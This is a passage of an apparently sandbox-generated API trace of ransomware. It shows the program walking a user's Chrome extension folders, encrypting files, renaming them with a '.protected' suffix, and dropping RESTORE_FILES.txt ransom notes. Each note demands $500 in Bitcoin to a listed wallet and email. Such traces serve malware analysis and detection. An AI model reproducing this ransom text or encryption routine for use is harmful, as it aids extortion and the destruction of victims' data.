(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.764] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.764] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.764] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.764] CloseHandle (hObject=0x164) returned 1 [0080.764] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.764] lstrcmpiW (lpString1="zu", lpString2="Windows") returned 1 [0080.764] lstrcmpiW (lpString1="zu", lpString2="Program Files") returned 1 [0080.764] lstrcmpiW (lpString1="zu", lpString2="Program Files (x86)") returned 1 [0080.764] lstrcmpiW (lpString1="zu", lpString2="$Recycle.bin") returned 1 [0080.764] lstrcmpiW (lpString1="zu", lpString2="System Volume Information") returned 1 [0080.764] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu") returned 141 [0080.764] lstrcmpW (lpString1="zu", lpString2=".") returned 1 [0080.764] lstrcmpW (lpString1="zu", lpString2="..") returned 1 [0080.764] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\*") returned 143 [0080.764] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.764] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.764] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.764] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.764] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.764] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.764] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\.") returned 143 [0080.764] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.764] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.764] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.765] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.765] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.765] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.765] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.765] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\..") returned 144 [0080.765] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.765] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.765] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.765] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.765] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.765] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.765] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.765] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.765] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\messages.json") returned 155 [0080.765] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.765] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.765] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.765] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.765] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.765] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\messages.json") returned 155 [0080.765] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.765] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\messages.json") returned 155 [0080.765] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.765] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\messages.json") returned 155 [0080.765] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.765] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xc2, lpOverlapped=0x0) returned 1 [0080.766] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff3e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.766] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xc2, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xc2, lpOverlapped=0x0) returned 1 [0080.766] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.766] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.766] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.766] CloseHandle (hObject=0x168) returned 1 [0080.767] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\messages.json.protected") returned 165 [0080.767] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\messages.json.protected")) returned 1 [0080.767] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.767] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.767] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\RESTORE_FILES.txt") returned 159 [0080.767] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.768] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.768] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.768] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.768] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.768] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.768] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.769] CloseHandle (hObject=0x164) returned 1 [0080.769] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0 [0080.769] FindClose (in: hFindFile=0x47bbd0 | out: hFindFile=0x47bbd0) returned 1 [0080.769] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\RESTORE_FILES.txt") returned 156 [0080.769] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0080.769] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.769] WriteFile (in: hFile=0x160, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295db84*=0x53d, lpOverlapped=0x0) returned 1 [0080.770] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.770] WriteFile (in: hFile=0x160, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295db84*=0x2ac, lpOverlapped=0x0) returned 1 [0080.770] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.770] WriteFile (in: hFile=0x160, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295db84*=0xb1, lpOverlapped=0x0) returned 1 [0080.770] CloseHandle (hObject=0x160) returned 1 [0080.770] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0080.770] lstrcmpiW (lpString1="_metadata", lpString2="Windows") returned -1 [0080.770] lstrcmpiW (lpString1="_metadata", lpString2="Program Files") returned -1 [0080.770] lstrcmpiW (lpString1="_metadata", lpString2="Program Files (x86)") returned -1 [0080.770] lstrcmpiW (lpString1="_metadata", lpString2="$Recycle.bin") returned 1 [0080.770] lstrcmpiW (lpString1="_metadata", lpString2="System Volume Information") returned -1 [0080.770] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata") returned 139 [0080.770] lstrcmpW (lpString1="_metadata", lpString2=".") returned 1 [0080.770] lstrcmpW (lpString1="_metadata", lpString2="..") returned 1 [0080.770] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\*") returned 141 [0080.770] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\*", lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0x47bbd0 [0080.771] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.771] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.771] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.771] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.771] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.771] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\.") returned 141 [0080.771] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.771] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.771] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.771] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.771] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.771] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.771] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.771] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\..") returned 142 [0080.771] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.771] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.771] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.771] lstrcmpiW (lpString1="computed_hashes.json", lpString2="Windows") returned -1 [0080.771] lstrcmpiW (lpString1="computed_hashes.json", lpString2="Program Files") returned -1 [0080.771] lstrcmpiW (lpString1="computed_hashes.json", lpString2="Program Files (x86)") returned -1 [0080.771] lstrcmpiW (lpString1="computed_hashes.json", lpString2="$Recycle.bin") returned 1 [0080.771] lstrcmpiW (lpString1="computed_hashes.json", lpString2="System Volume Information") returned -1 [0080.771] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\computed_hashes.json") returned 160 [0080.771] StrStrIW (lpFirst="computed_hashes.json", lpSrch=".protected") returned 0x0 [0080.771] lstrcmpW (lpString1="computed_hashes.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.771] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295db3c | out: pbBuffer=0x295db3c) returned 1 [0080.772] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295db64*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295db64*=0x30) returned 1 [0080.772] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\computed_hashes.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.772] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\computed_hashes.json") returned 160 [0080.772] StrStrW (lpFirst="computed_hashes.json", lpSrch=".txt") returned 0x0 [0080.772] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\computed_hashes.json") returned 160 [0080.772] StrStrW (lpFirst="computed_hashes.json", lpSrch=".rar") returned 0x0 [0080.772] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\computed_hashes.json") returned 160 [0080.772] StrStrW (lpFirst="computed_hashes.json", lpSrch=".zip") returned 0x0 [0080.772] ReadFile (in: hFile=0x164, lpBuffer=0xd010e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesRead=0x295db84*=0xaf3, lpOverlapped=0x0) returned 1 [0080.773] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xfffff50d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.773] WriteFile (in: hFile=0x164, lpBuffer=0xd010e0*, nNumberOfBytesToWrite=0xaf3, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesWritten=0x295db84*=0xaf3, lpOverlapped=0x0) returned 1 [0080.773] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.773] WriteFile (in: hFile=0x164, lpBuffer=0x295db5c*, nNumberOfBytesToWrite=0x4, 